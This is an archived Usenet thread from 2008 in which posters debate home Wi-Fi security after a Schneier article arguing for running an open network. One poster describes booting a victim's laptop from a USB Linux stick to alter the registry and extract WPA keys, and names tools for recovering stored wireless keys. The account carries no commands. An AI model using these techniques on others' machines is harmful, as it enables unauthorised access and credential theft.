* Use WPA security. If you don't do this, assume you will get hacked.
WEP is essentially worthless. Replace wireless equipment that doesn't
support WPA. Seriously. (See Wi-Fi Security)
* Use a strong WPA passphrase. A good way to do that is with diceware
words. (See What Makes for a Strong Password or Passphrase?) Write your
passphrase on a label and stick it on the bottom of your wireless router
so you won't forget it. (If someone gets to your wireless router, you
are compromised regardless.)
* Make your wireless SSID unique. This helps avoid network collisions. A
good way to do this is to use your address, phone number, and/or name
for your SSID (making it easy for you to be contacted if something is
wrong with your wireless network).
* Don't bother with SSID hiding or MAC address filtering. They don't do
any real good (improve security) but they can cause you grief. (See
Wi-Fi Security Myths)
* Turn off Universal Plug and Play (UPnP) in your wireless router.
Because most consumer-grade wireless routers lack UPnP authentication
they are vulnerable to attack. (See Problems with UPnP, Lack of
Authentication)
* Set a strong password on the administration interface of your wireless
router. Again, diceware is a good way to do that.
* Turn off remote administration. If your wireless router supports
remote administration, turn it off (unless you really know what you're
doing).
* On unsecured Wi-Fi use VPN (Virtual Private Networking). Otherwise
your wireless traffic can be snooped and compromised. (See Secure
Internet access in a public hotspot)
--
Best regards, FAQ for Wireless Internet: <http://wireless.navas.us>
John Navas FAQ for Wi-Fi: <http://wireless.navas.us/wiki/Wi-Fi>
Wi-Fi How To: <http://wireless.navas.us/wiki/Wi-Fi_HowTo>
Fixes to Wi-Fi Problems: <http://wireless.navas.us/wiki/Wi-Fi_Fixes>
<http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
John
>Interesting counter point to securing your wireless
><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
Bruce Schneier is a well regarded author of criticism on security
issues. He's made a career of writing articles, columns, and two
books on the topic. Scan the list of titles and tell me if you see a
pattern:
<http://www.schneier.com/essays.html>
I'll be blunt (because I'm in hurry to leave for a free lunch).
Whom would you prefer to believe? The person that has to make the
stuff work and keep the paying customers safe and happy? Or the
professional author and critic that takes pot shots at the industries
attempts to get it right? Pick one.
Do you subscribe to this manner of FUD (fear uncertainty doubt):
"This is not to say that the new wireless security protocol,
WPA, isn't very good. It is. But there are going to be
security flaws in it; there always are."
Swell. Leave your access point wide open because your neighbors might
need it and because your chances of experiencing a problem is minimal.
Never mind with encryption because it *MIGHT* be cracked in the
future. While you're at it, leave your car doors unlocked for the
same reasons. Door locks are easily picked, so why bother to use
them.
Incidentally, the real danger is not DMCA or spammers. It's someone
giving themselves a tour of your computer, grabbing whatever seems
interesting, because an overwhelming number of machines are running
open shares and zero local security (i.e. passwords). Since the
wireless LAN is behind the router, the firewall offers zero
protection.
More later....
--
Jeff Liebermann je...@cruzio.com
150 Felker St #D http://www.LearnByDestroying.com
Santa Cruz CA 95060 http://802.11junk.com
Skype: JeffLiebermann AE6KS 831-336-2558
Well since he is CTO of BT Counterpane I would say he and his company
are in the business of making security work.
I thought the most imprtant pat of the article was
"If I configure my computer to be secure regardless of the network
it's on, then it simply doesn't matter. And if my computer isn't secure
on a public network, securing my own network isn't going to reduce my
risk very much.
Yes, computer security is hard. But if your computers leave your house,
you have to solve it anyway. And any solution will apply to your desktop
machines as well. "
>
> Do you subscribe to this manner of FUD (fear uncertainty doubt):
> "This is not to say that the new wireless security protocol,
> WPA, isn't very good. It is. But there are going to be
> security flaws in it; there always are."
> Swell. Leave your access point wide open because your neighbors might
> need it and because your chances of experiencing a problem is minimal.
> Never mind with encryption because it *MIGHT* be cracked in the
> future. While you're at it, leave your car doors unlocked for the
> same reasons. Door locks are easily picked, so why bother to use
> them.
>
> Incidentally, the real danger is not DMCA or spammers. It's someone
> giving themselves a tour of your computer, grabbing whatever seems
> interesting, because an overwhelming number of machines are running
> open shares and zero local security (i.e. passwords). Since the
> wireless LAN is behind the router, the firewall offers zero
> protection.
>
> More later....
>
John
I recently acquired a 2wire 2701HG-B to get around issues with my
crappy (free) Creative Briteport DSL modem. I still use my linksys
WRT330N for wifi and my lan, but technically I could turn on the wifi
on the 2701HG-B. I make the linksys be the DMZ of the 2wire box. But I
believe that means my LAN and wifi on the linksys is behind it's own
firewall, so enabling open wifi on the 2wire would be safe.
I have some Gemtek P-560s I considered installing on the router ports
of the 2wire to give me another level of protection.
Is there some website that hosts manuals on discontinued wifi gear,
much like the boat anchor website does for test gear? I have the CD
rom that comes with the P-560. It seems Gemtek doesn't maintain
documentation on discontinued products.
Correction: they're in the business of /selling/ security solutions to
people.
When your business is selling a cure for X, its a useful marketing tool
to make people worried that X is a risk. And its especially useful to
hint that its really hard to fix - it helps justify ones fees.... :-)
I mean, if the guy down the vehicle repair shop went around telling
everyone it was easy to change the head gasket, who would bother taking
the car in? So he sucks his teeth, mumbles about it being hard to get
the parts, its tricky on these older models because the flange baffle
retaining plate is obscured by the grommet recycling arm, he'll need a
special tool which he'll have to charge for etc etc.
> I thought the most imprtant pat of the article was
>
> "If I configure my computer to be secure regardless of the network it's
> on, then it simply doesn't matter. And if my computer isn't secure on a
> public network, securing my own network isn't going to reduce my risk
> very much.
Euh, that says nothing. I'd call it a platitude.
> Interesting counter point to securing your wireless
>
> <http://www.wired.com/politics/security/commentary/securitymatters/2008/01/sec
> uritymatters_0110>
Yeah, well, there will always be tree-huggers and wing-nuts and women
who don't shave their pits and practice aromatherapy.
I catch Schneier downloading spanking videos in front of my house, I'll
ram a rottweiler up his ass. Irresponsible wanking.
My house is private, it's not a hotel or a motel or a brothel or a
Starbucks and I have a very secure WPA password. If we have guest want
to use it, I give them the password. It's pretty simple really. The
next-door neighbour who I trust fully also has the password in case his
network goes down; he does the same for me (he's using WEP which I can
crack if I want anyway). Although, we have the same ISP, so it's kind of
a useless exercise in neighbourly admiration.
That's the worst fucking article I've ever read in Wired.
--
W. Oates
> It's someone
> giving themselves a tour of your computer, grabbing whatever seems
> interesting, because an overwhelming number of machines are running
> open shares and zero local security (i.e. passwords). Since the
> wireless LAN is behind the router, the firewall offers zero
I might add that my local "shares" are nicely and tightly protected too
(it's a Mac, we don't really talk that way). My next step is to separate
the wireless (guests and the neighbour), put it on a separate route (if
that's how you say it) from the wire (me and the oul' Woman and the tv).
--
W. Oates
>On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
><notv...@cox.net.invalid> wrote:
>
>>Interesting counter point to securing your wireless
>><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>
>Bruce Schneier is a well regarded author of criticism on security
>issues. He's made a career of writing articles, columns, and two
>books on the topic. Scan the list of titles and tell me if you see a
>pattern:
><http://www.schneier.com/essays.html>
>
>I'll be blunt (because I'm in hurry to leave for a free lunch).
>Whom would you prefer to believe? The person that has to make the
>stuff work and keep the paying customers safe and happy? Or the
>professional author and critic that takes pot shots at the industries
>attempts to get it right? Pick one.
In a vacuum, I would tend to pick the professional over the repairman,
but I hope one wouldn't have to pick in a vacuum.
>Do you subscribe to this manner of FUD (fear uncertainty doubt):
> "This is not to say that the new wireless security protocol,
> WPA, isn't very good. It is. But there are going to be
> security flaws in it; there always are."
I don't think that qualifies as FUD. Not even close.
>Swell. Leave your access point wide open because your neighbors might
>need it and because your chances of experiencing a problem is minimal.
>Never mind with encryption because it *MIGHT* be cracked in the
>future. While you're at it, leave your car doors unlocked for the
>same reasons. Door locks are easily picked, so why bother to use
>them.
I'm not sure how you arrived at your conclusion, but I suspect it had
a lot to do with your mind being on the free lunch. :)
Pointing out that something isn't perfect is a far cry from advising
people not to use it.
>On Fri, 28 Nov 2008 12:11:32 -0800, Jeff Liebermann <je...@cruzio.com>
>wrote:
>
>>On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
>><notv...@cox.net.invalid> wrote:
>>
>>>Interesting counter point to securing your wireless
>>><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>>
>>Bruce Schneier is a well regarded author of criticism on security
>>issues. He's made a career of writing articles, columns, and two
>>books on the topic. Scan the list of titles and tell me if you see a
>>pattern:
>><http://www.schneier.com/essays.html>
>>
>>I'll be blunt (because I'm in hurry to leave for a free lunch).
>>Whom would you prefer to believe? The person that has to make the
>>stuff work and keep the paying customers safe and happy? Or the
>>professional author and critic that takes pot shots at the industries
>>attempts to get it right? Pick one.
>
>In a vacuum, I would tend to pick the professional over the repairman,
>but I hope one wouldn't have to pick in a vacuum.
Well, I screwed up several times here.
I try to never judge the source, only the content. However, I shoved
my foot in my mouth and managed to criticize the source instead of the
content. I'll try not to repeat my mistake.
About 2 years ago, I declared (in this newsgroup) that I would never
get involved in another security discussion. Well, I blew it and did.
Too late. The problem is that in such discussions, there is no right
answer. There's no "do this and you'll be secure". There's only best
effort, due diligence, perpetual vigilance, and reading endless pages
of boring log files. What works well today, is tomorrows security
hole.
John Navas posted what I consider to a be a good minimal list of
security measures. None of the items listed a prefect, none will be
eternally secure, and none offer a guarantee. When someone offers a
better list of basic security measures, I might consider recommending
an update to the security essentials. Note that the John's Wiki is
open to public comments and additions. If you don't like it, change
it, or preferably add to it.
Instead of pounding on the solution, perhaps it would be helpful to
explain the problem. (Incidentally, this is my pet peeve). Wireless
routers are shipped insecure by default. Take any router out of the
box, plug it in, do NOTHING, and unless you have AT&T DSL which
requires a PPPoE login and password, you're online and on the air.
This is great for the customer "out of the box experience" and a total
disaster for security. Despite the deluge of articles on wireless
security, most customers still don't have a clue. Obviously,
something is not working. I have often suggested that manufacturers
adopt the method used by 2wire, which requires setting up a login
password and creates a unique SSID and WEP/WPA password, or you don't
get to use the route.
If the customer absolutely has to run a wide open system, as in a
coffee shop, then by all means, let them. However, the default setup
should be locked up tight, with passwords and encryption at every
turn.
So, rather than solve the problem, we have this brilliant head of a
security company, offer that the solution is to ignore the problem
completely, and just run a wide open system on the basis of the odds
being in favor of nothing bad happening. He's right, in that one can
get away with doing almost anything, but only for a short while.
Eventually bad karma and stupidity catch up.
(Incidentally: In college, I had a class in traffic engineering. One
of the fun exercises was to calculate and later model the probability
of a head-on collision by driving the wrong way up various road types
and traffic densities. Under certain conditions, one can go for a
surprisingly long time before meeting the inevitable).
As for the repairman versus the professional (insert title), my
preferences tend to vary. Next time you have a problem with your
automobile, try asking an automotive engineer for a usable solution.
I've actually done this. I think you'll find that the repairman knows
more about how to fix the car than the designer. If you're concerned
about my status as a repairman, be advised that I have 3 small medical
offices as customers that require HIPAA security compliance. In my
admittedly limited experience, there's nothing wrong with the
technology. It's how it's used that tends to cause problem. Fixing
that is where the repairman is required.
>>Do you subscribe to this manner of FUD (fear uncertainty doubt):
>> "This is not to say that the new wireless security protocol,
>> WPA, isn't very good. It is. But there are going to be
>> security flaws in it; there always are."
>
>I don't think that qualifies as FUD. Not even close.
I usually ignore one line pontification and judgments, but since I
asked for an opinion, I won't complain. However, you're wrong. What
Bruce Schneier has done here is classical FUD. In his first sentence,
he compliments WPA and re-affirms that it is good. As an side point,
note that he uses negatives two negatives in that statement. The
statement is positive, but the sentence construction makes it not so
definite. He then goes on to announce that there are going to be
problems (without stating what problems) with WPA, for no better
reason than there are always problems. Well, if it's not FUD, it's
certainly defeatist.
Now, permit me to explain WHY he's doing that. I do the same thing
when I have a difficult customer. Instead of promoting my points and
recommendations, I proceed to tear down literally everything
available. It doesn't matter what hardware or software is on the
table, I can find something that *MIGHT* be wrong with it. Note that
I don't need to actually find something wrong, just potentially wrong.
When I'm done, there's nothing left to chose from. By default, I get
to do what I proposed in the first place. Bruce Schneier couldn't
find anything specifically wrong with WPA, so the best he could do was
imply that there *MIGHT* be something wrong. That's FUD methinks.
>>Swell. Leave your access point wide open because your neighbors might
>>need it and because your chances of experiencing a problem is minimal.
>>Never mind with encryption because it *MIGHT* be cracked in the
>>future. While you're at it, leave your car doors unlocked for the
>>same reasons. Door locks are easily picked, so why bother to use
>>them.
>
>I'm not sure how you arrived at your conclusion, but I suspect it had
>a lot to do with your mind being on the free lunch. :)
Ummm... I didn't write a conclusion. The quoted paragraph is a
cynical and sarcastic recommendations. That's my normal mode of
operation and does not require the diversion of a free lunch, which
incidentally was marginal at best. I did get to play with several
Asus eee PC 700 and 900 notebooks. I want one (even if I couldn't
type on the keyboard).
The part about leaving the car door open is called an analogy. Leave
the WPA security disabled because it might be cracked. Leave the car
unlocked because the door locks might be picked. All analogies break
down under sufficient scrutiny, but methinks these are sufficiently
close to survive.
>Pointing out that something isn't perfect is a far cry from advising
>people not to use it.
Did you read the article? Bruce Schneier never actually came out and
recommended that one should not use wireless security. Yet the entire
article is all about how wonderful and easy things are without that
horribly difficult wireless security, and how successful he and others
have been running wide open system. There are even recommendations of
replacement firmware to make it easier. It's kinda like that with
many forms of display advertising. One never ever suggests that the
listener or viewer should actually buy something. One just shows a
wonderful picture of how happy they will be if they happen to have the
product. (Full Disclosure: I have an ancient advertising and
marketing background).
>Jeff Liebermann wrote:
>> On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
>> <notv...@cox.net.invalid> wrote:
>>
>>> Interesting counter point to securing your wireless
>>> <http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>>
>> Bruce Schneier is a well regarded author of criticism on security
>> issues. He's made a career of writing articles, columns, and two
>> books on the topic. Scan the list of titles and tell me if you see a
>> pattern:
>> <http://www.schneier.com/essays.html>
>>
>> I'll be blunt (because I'm in hurry to leave for a free lunch).
>> Whom would you prefer to believe? The person that has to make the
>> stuff work and keep the paying customers safe and happy? Or the
>> professional author and critic that takes pot shots at the industries
>> attempts to get it right? Pick one.
>
>Well since he is CTO of BT Counterpane I would say he and his company
>are in the business of making security work.
Have you ever worked with a security company? I have. There are an
amazingly wide range of business functions that can be performed by a
security company. It can be code audits, access control, permissions,
authorization, authentication, identity management, external security,
physical security, patch management, site monitoring, access devices,
HIPAA, FASP, log rolling, etc. I probably forgot a few items.
<http://bt.counterpane.com>
Looks like they do all those and then some. Yep, they're definately
qualified.
Impressive list of principals, but missing Bruce Schneier:
<http://bt.counterpane.com/team.html>
So, why does he recommend *LESS* wireless security? Did I miss
something here?
>I thought the most imprtant pat of the article was
>
> "If I configure my computer to be secure regardless of the network
>it's on, then it simply doesn't matter. And if my computer isn't secure
>on a public network, securing my own network isn't going to reduce my
>risk very much.
Baloney. I could have an adquately secured computah (personal
firewall) and still have problems. For example, sending un-encrypted
email and passwords (POP3, SMTP, FTP) that are sniffable via wireless
or an ethernet tap. The computer is secure, but the transport
mechanism is not.
>Yes, computer security is hard. But if your computers leave your house,
>you have to solve it anyway. And any solution will apply to your desktop
>machines as well. "
Well, yeah. A laptop is nothing more than a small desktop with a
built in UPS (battery). Desktops, laptops, and PDA's should be
treated in the same way when dealing with security. Few are.
>John
In part of the article he states he doesn't believe that it is much of a
risk that his wireless will be abused
>
>> I thought the most imprtant pat of the article was
>>
>> "If I configure my computer to be secure regardless of the network
>> it's on, then it simply doesn't matter. And if my computer isn't secure
>> on a public network, securing my own network isn't going to reduce my
>> risk very much.
>
> Baloney. I could have an adquately secured computah (personal
> firewall) and still have problems. For example, sending un-encrypted
> email and passwords (POP3, SMTP, FTP) that are sniffable via wireless
> or an ethernet tap. The computer is secure, but the transport
> mechanism is not.
I would consider fixing those type of problems part of making sure that
your computer is safe on a public network.
>
>> Yes, computer security is hard. But if your computers leave your house,
>> you have to solve it anyway. And any solution will apply to your desktop
>> machines as well. "
>
> Well, yeah. A laptop is nothing more than a small desktop with a
> built in UPS (battery). Desktops, laptops, and PDA's should be
> treated in the same way when dealing with security. Few are.
>
I agree
>> John
>
>In part of the article he states he doesn't believe that it is much of a
>risk that his wireless will be abused
In a previous posting in this thread, I mentioned what happened when I
was running an open access point in my office. Local homeless in
campers would park outside my office making VoIP phone calls. Not a
problem, but this idiot told all his friends and my (shared) bandwidth
was soon swamped. I turned on encryption and that was the end of my
experiment in openness.
>> Baloney. I could have an adquately secured computah (personal
>> firewall) and still have problems. For example, sending un-encrypted
>> email and passwords (POP3, SMTP, FTP) that are sniffable via wireless
>> or an ethernet tap. The computer is secure, but the transport
>> mechanism is not.
>I would consider fixing those type of problems part of making sure that
>your computer is safe on a public network.
Part of that might be fixing the authors original statement. His
contention was (in my words) that if his computer was secure, then he
has nothing to worry about in a public unencrypted system. He's wrong
because of sniffing problems. Ask any user in a coffee shop if their
POP3, SMTP, and FTP passwords are encrypted or not. I've done this
and got the predictable blank looks. I know quite a few ISP's that
still use unencrypted passwords, with no provisions for SSL, TLS, or
VPN terminations.
>> Well, yeah. A laptop is nothing more than a small desktop with a
>> built in UPS (battery). Desktops, laptops, and PDA's should be
>> treated in the same way when dealing with security. Few are.
>I agree
Something is wrong here. Nobody ever agrees with me. Are you sure?
I have 5 VPN clients on my Verizon XV6700 cell phone running Windoze
Mobile 5. All of them sorta work, with specific terminating servers.
None of them work with all the different VPN boxes and servers I have
to connect. I've given up and gone back to dragging my giant laptop
around. However, I was lusting after an Asus eeePC 900 today, and
just might buy one. Small is beautiful.
Incidentally, I have an impromptu hacking demonstration today. I shut
down the victims laptop (allegedly accidentally). When nobody's
looking, I shove in a USB dongle with a bootable Linux system
including various registry hacking utilities. I scripted one of them
to make a few key changes to the registry, and to extract a few
interesting keys. Most modern laptops will boot from USB, especially
if I hit F10(?) during the bootup to select the boot device. The rest
is trivial. Elapsed time is about 3 minutes, not including a 2nd
reboot. Perhaps the author would like to revise his position on
computer hardware security to include physical security?
I'm only a repairman. Imagine what a real hacker can do.
> ... rather than solve the problem, we have this brilliant head of a
> security company, offer that the solution is to ignore the problem
> completely, and just run a wide open system on the basis of the odds
> being in favor of nothing bad happening. He's right, in that one can
> get away with doing almost anything, but only for a short while.
> Eventually bad karma and stupidity catch up.
Based on the above, I think that you have mis-understood the article
in question. Schneier makes the point that what he's trying to protect
(as are most people) is his computer(s), and the data on it(them).
His effort, therefore, is better spent applying security mechanisms on
the computer itself, rather than trying to "protect" access to his network
(which, incidentally, he seems perfectly willing to just share).
As an analogy, consider the locks on the doors and windows of a house:
if you move into a gated-community, you're likely going to still want
locks on your doors and windows. Schneier's point (applied to this
analogy), isn't that you shouldn't move into a gated community, but
rather that you should protect your house and its contents by applying
security measures (locks on doors and windows) directly to the house.
You can take it as a given that at some time, someone who doesn't belong
in the gated community will find a way in.
Especially with a mobile computer, given that you are more likely to use
such a computer on a network that is outside of your control (and that
has other users you likely don't know and shouldn't trust), there needs
to be strong effort placed on protecting the computer itself, and its
data. That protection comes from end-to-end encryption (https, imaps,
ssh, TLS/SSL, etc.), not from WEP/WPA/WPA2/802.11i, etc.
> ... Bruce Schneier couldn't find anything specifically wrong with
> WPA, so the best he could do was imply that there *MIGHT* be something
> wrong. That's FUD methinks.
Again, I think you've misunderstood his point: When WEP was introduced, it
was touted as providing security that was equivalent to wired networking.
That turned out (after some time) not to be true. Scheiers point
isn't that there "might" be something wrong with WPA (or WPA2), it's
that regardless of whether there is a known weakness with it now,
as technology improves, the computing power that can be put towards
brute-force attacks (and ultimately more calculated attacks) increases,
and therefore the degree of security offered by technology that's "good
enough" today decreases.
If you think it's all FUD, consider the following (as one example):
http://hothardware.com/News/Russian-Firm-Uses-NVIDIA-GPUs-To-Crack-WPA-WPA2/
Scheier's preference is for "easy" access to the network. He claims to
like it that way. However, his point is that trying to protect the data
on the computer by attempting to secure access to the network is the
wrong way to go about it (and in some cases might be seen as duplicated
effort). See Bill Cheswick's paper on the design of Internet gateways
(which a wireless access point can ultimately be) for another
(compatible) explanation (that predates wireless networking; although
the details of the technology have changed, the points are still valid,
and on a broad scale we have not yet appeared to have learned them):
http://www.cheswick.com/ches/papers/gateway.pdf
> The part about leaving the car door open is called an analogy. Leave
> the WPA security disabled because it might be cracked.
That isn't at all Scheier's point. Leave WPA disabled, because he
prefers to share the network access. And by the way, even if WPA is
considered a suitable way to secure access to your network at the momen,
don't count on it to secure the data on your computer. Referring back
to my earlier analogy, that would be like counting on the locked gate at
the end of the street to protect your home from being entered by
unwelcome strangers.
> ... Bruce Schneier never actually came out and recommended that one
> should not use wireless security. Yet the entire article is all about
> how wonderful and easy things are without that horribly difficult
> wireless security, and how successful he and others have been running
> wide open system. ...
He's not worrying about securing his wireless network because he's
comfortable with how well the computers he has on that network are
secured. The effort he invested in securing his computers is returned
to him in his ability to not worry about the odd stranger using his
wireless network (as someone might take a walk down the street of a
gated community).
Now, having said all of that, I keep my own wireless network secured,
but all the computers I have that either use it, or are accessible from
it, also are secured as well as they can be. I don't count on the
wireless security to protect my computers, but I do expect that it will
keep most uninvited strangers from using my network.
--
----------------------------------------------------------------------
Sylvain Robitaille s...@alcor.concordia.ca
Systems analyst / AITS Concordia University
Faculty of Engineering and Computer Science Montreal, Quebec, Canada
----------------------------------------------------------------------
> Incidentally, I have an impromptu hacking demonstration today. I shut
> down the victims laptop (allegedly accidentally). When nobody's
> looking, I shove in a USB dongle with a bootable Linux system
> including various registry hacking utilities. I scripted one of them
> to make a few key changes to the registry, and to extract a few
> interesting keys. Most modern laptops will boot from USB, especially
> if I hit F10(?) during the bootup to select the boot device. The rest
> is trivial. Elapsed time is about 3 minutes, not including a 2nd
> reboot. Perhaps the author would like to revise his position on
> computer hardware security to include physical security?
Most (all?) modern laptops also provide a means to set a password to
control access to the boot-sequence configuration, or in some cases to
boot the computer at all. Your demonstration would fail on my laptop
(notwithstanding that it wouldn't even find Windows on it), and if you
understood the point of the author's (Scheier's) article, you would
understand that you would have the same problem with *his* laptop.
The network access point (wireless or otherwise) provides access to the
network, not "security". That's the point I read in the article being
discussed.
>On Fri, 28 Nov 2008 19:27:17 -0600, Char Jackson <no...@none.invalid>
>wrote:
>
>>On Fri, 28 Nov 2008 12:11:32 -0800, Jeff Liebermann <je...@cruzio.com>
>>wrote:
>>
>>>I'll be blunt (because I'm in hurry to leave for a free lunch).
>>>Whom would you prefer to believe? The person that has to make the
>>>stuff work and keep the paying customers safe and happy? Or the
>>>professional author and critic that takes pot shots at the industries
>>>attempts to get it right? Pick one.
>>
>>In a vacuum, I would tend to pick the professional over the repairman,
>>but I hope one wouldn't have to pick in a vacuum.
>
>Well, I screwed up several times here.
I thought I did that once, but I was mistaken. ;-)
>As for the repairman versus the professional (insert title), my
>preferences tend to vary. Next time you have a problem with your
>automobile, try asking an automotive engineer for a usable solution.
>I've actually done this. I think you'll find that the repairman knows
>more about how to fix the car than the designer.
Well, of course, if you're looking for repair advice the repairman is
likely to know more, but your question above was a much more generic
"whom would you believe". Since your preferences vary, I assume you
agree with me at least part of the time that the professional
(professional WHAT?) is likely to be the better source sometimes.
>>>Do you subscribe to this manner of FUD (fear uncertainty doubt):
>>> "This is not to say that the new wireless security protocol,
>>> WPA, isn't very good. It is. But there are going to be
>>> security flaws in it; there always are."
>>
>>I don't think that qualifies as FUD. Not even close.
>
>I usually ignore one line pontification and judgments, but since I
>asked for an opinion, I won't complain. However, you're wrong. What
>Bruce Schneier has done here is classical FUD.
FUD is fear, uncertainty, and doubt. I may be wrong, or you may be
wrong, but my opinion is that the part you quoted above doesn't
contain any of those three qualities. I'm able to parse the quoted
statements and understand that he's saying WPA is good, but not likely
to be perfect. I don't know when it was written, but we know now that
WPA has security flaws, so he was either right in advance or right in
arrears, but either way he is/was right. Just like truth is the best
defense against libel, I think truth is a pretty darn strong defense
against a claim of FUD.
>>>Swell. Leave your access point wide open because your neighbors might
>>>need it and because your chances of experiencing a problem is minimal.
>>>Never mind with encryption because it *MIGHT* be cracked in the
>>>future. While you're at it, leave your car doors unlocked for the
>>>same reasons. Door locks are easily picked, so why bother to use
>>>them.
>>
>>I'm not sure how you arrived at your conclusion, but I suspect it had
>>a lot to do with your mind being on the free lunch. :)
>
>Ummm... I didn't write a conclusion. The quoted paragraph is a
>cynical and sarcastic recommendations.
Your conclusion was that since WPA may or does have problems, we
should just avoid it entirely. Like I said, I don't see how you
arrived at that conclusion, or whatever you'd rather call it. That
'position' certainly doesn't follow the quoted paragraph that came
before it, so now I'm assuming that you were responding to something
else from that article that you didn't feel was worth quoting.
>The part about leaving the car door open is called an analogy.
Yes, analogies are common. No need to point them out.
>Leave the WPA security disabled because it might be cracked.
See? THAT! How did you arrive there? Besides you, who else suggested
it would be a good idea to leave WPA disabled because it might be
cracked? If not from you, did you get it from the article? That's
really all I'm asking.
>>Pointing out that something isn't perfect is a far cry from advising
>>people not to use it.
>
>Did you read the article?
No, I was responding to what you wrote, not to what someone wrote in
an article. You didn't make it clear that I had to read the article
before climbing onto the ride. :)
Trouble is, leaving your network open is like letting someone else run a
FREIGHT TRAIN through your suburban back yard.
All this hand waving about security fails to take bandwidth consumption into
account. Beyond securing your own resources (and privacy of your network
traffic) is making sure the bandwidth you pay for is the bandwidth you get.
Not gobbled up by some nitwit downloading tremendous amounts, or a spam
botnet inundating everyone else with junk e-mail.
Goes back to the age olld problem if needed to know about and understand
the risks to be able to make an appropriate decision
>
>>> Well, yeah. A laptop is nothing more than a small desktop with a
>>> built in UPS (battery). Desktops, laptops, and PDA's should be
>>> treated in the same way when dealing with security. Few are.
>
>> I agree
>
> Something is wrong here. Nobody ever agrees with me. Are you sure?
Yes
>
> I have 5 VPN clients on my Verizon XV6700 cell phone running Windoze
> Mobile 5. All of them sorta work, with specific terminating servers.
> None of them work with all the different VPN boxes and servers I have
> to connect. I've given up and gone back to dragging my giant laptop
> around. However, I was lusting after an Asus eeePC 900 today, and
> just might buy one. Small is beautiful.
>
> Incidentally, I have an impromptu hacking demonstration today. I shut
> down the victims laptop (allegedly accidentally). When nobody's
> looking, I shove in a USB dongle with a bootable Linux system
> including various registry hacking utilities. I scripted one of them
> to make a few key changes to the registry, and to extract a few
> interesting keys. Most modern laptops will boot from USB, especially
> if I hit F10(?) during the bootup to select the boot device. The rest
> is trivial. Elapsed time is about 3 minutes, not including a 2nd
> reboot. Perhaps the author would like to revise his position on
> computer hardware security to include physical security?
>
> I'm only a repairman. Imagine what a real hacker can do.
>
>
If you don't want to shut machine down
<http://wiki.hak5.org/wiki/USB_Switchblade>
If you have local access to the machine and can control the boot up
there are many ways to own it, but if data is properly protected the
threat is mitigated
John
>Jeff Liebermann wrote:
>> I'll be blunt (because I'm in hurry to leave for a free lunch).
>> Whom would you prefer to believe? The person that has to make the
>> stuff work and keep the paying customers safe and happy? Or the
>> professional author and critic that takes pot shots at the industries
>> attempts to get it right? Pick one.
>I thought the most imprtant pat of the article was
>
> "If I configure my computer to be secure regardless of the network
>it's on, then it simply doesn't matter. And if my computer isn't secure
>on a public network, securing my own network isn't going to reduce my
>risk very much.
>
>Yes, computer security is hard. But if your computers leave your house,
>you have to solve it anyway. And any solution will apply to your desktop
>machines as well. "
It's simply not possible to "configure my computer to be secure
regardless of the network it's on" -- any computer on a network is
insecure, period.
Arguing that it's OK to leave the network open because the computer is
secure is a bit like arguing that there's no need to drive safely when
wearing a seatbelt.
>Schneier makes the point that what he's trying to protect
>(as are most people) is his computer(s), and the data on it(them).
>His effort, therefore, is better spent applying security mechanisms on
>the computer itself, rather than trying to "protect" access to his network
>(which, incidentally, he seems perfectly willing to just share).
As I've mentioned several times, the computer can be almost totally
protected, but without encrypting the wireless traffic, a simple
sniffer can capture unencrypted traffic, passwords, email, etc.
>Schneier's point (applied to this
>analogy), isn't that you shouldn't move into a gated community, but
>rather that you should protect your house and its contents by applying
>security measures (locks on doors and windows) directly to the house.
>You can take it as a given that at some time, someone who doesn't belong
>in the gated community will find a way in.
Fine. I park my truck nearby, and setup my telescope, video camera,
long range microphone, electronic sniffer, etc. Maybe electronically
reconstruct the image on your CRT. Lots of ways to be intrusive, even
in a properly locked and secured house. Ready for TEMPEST grade
wallpaper and siding?
We can play this game forever. No amount of security is ever
sufficient. Given sufficient time, resources, and technology, any
level of security can eventually be compromised. That's why I detest
such security discussions. There's no right answers, no correct
solutions, and no guaranteed results.
However, that's all playing games with logic. What I find offensive
about Schneier's article is that he trashes the most basic and easist
form of security, which in this case is WPA. To get decent security,
the one part of the puzzle that must work is WPA. Everything else can
be no more than an additional obstacle, usually of minor importance.
>Scheiers point
>isn't that there "might" be something wrong with WPA (or WPA2), it's
>that regardless of whether there is a known weakness with it now,
>as technology improves, the computing power that can be put towards
>brute-force attacks (and ultimately more calculated attacks) increases,
>and therefore the degree of security offered by technology that's "good
>enough" today decreases.
I beg to differ. He first announces that WPA is quite good. Then
declares that all such good encryption methods are eventually cracked.
On that basis, he somehow justifies running an open system.
Incidentally, I find the double negative in his statement rather
intersting. In psychology, that's a sure sign that he's uncertain
about his logic.
>If you think it's all FUD, consider the following (as one example):
>http://hothardware.com/News/Russian-Firm-Uses-NVIDIA-GPUs-To-Crack-WPA-WPA2/
Clever. There's wide selection of password recovery tools available
for assorted applications. There are also brute force WPA crackers
that work with fairly short WPA pass phrases.
<http://arstechnica.com/articles/paedia/wpa-cracked.ars/>
However, why bother? I can just grab the registry keys and extract a
usable WPA hash code (not the actual key) with aircrack-ng, Cain and
Able, or others:
<http://www.passcape.com/wireless_keys_screenshots.htm>
<http://www.oxid.it/cain.html>
>Scheier's preference is for "easy" access to the network.
Yep. Same with Microsoft. Convenience and easy of use over security
and reliability. I'm not sure which is better. It makes no sense to
deliver a secure and reliable operating system that nobody can use.
Various Linux distributions were like that for a long time until they
wised up. I suspect a compromise is best. Wide open security is not
my idea of a good compromise between convenience and security.
>He claims to
>like it that way.
Sure. *I* also like it that way. Too bad it's not a good way to run
a wireless network. I have more problems with my coffee shop open
networks, than I ever have with those secured by a proper WPA key. Too
many things that can go wrong.
>However, his point is that trying to protect the data
>on the computer by attempting to secure access to the network is the
>wrong way to go about it (and in some cases might be seen as duplicated
>effort).
Yep. One of my former (not current) HIPAA customers uses an encrypted
database. In theory, one should not be able to view or extract useful
data without authorization and authentication. I demonstrated that I
could steal the entire drive, transplant it into a different machine,
and have access to all the data. They were not thrilled, especially
since some of their RAID array was missing. I'll spare you my opinion
of their security and software provider. I've had similar fiascos
with USB keys, remote access software, and of course, wireless. Also,
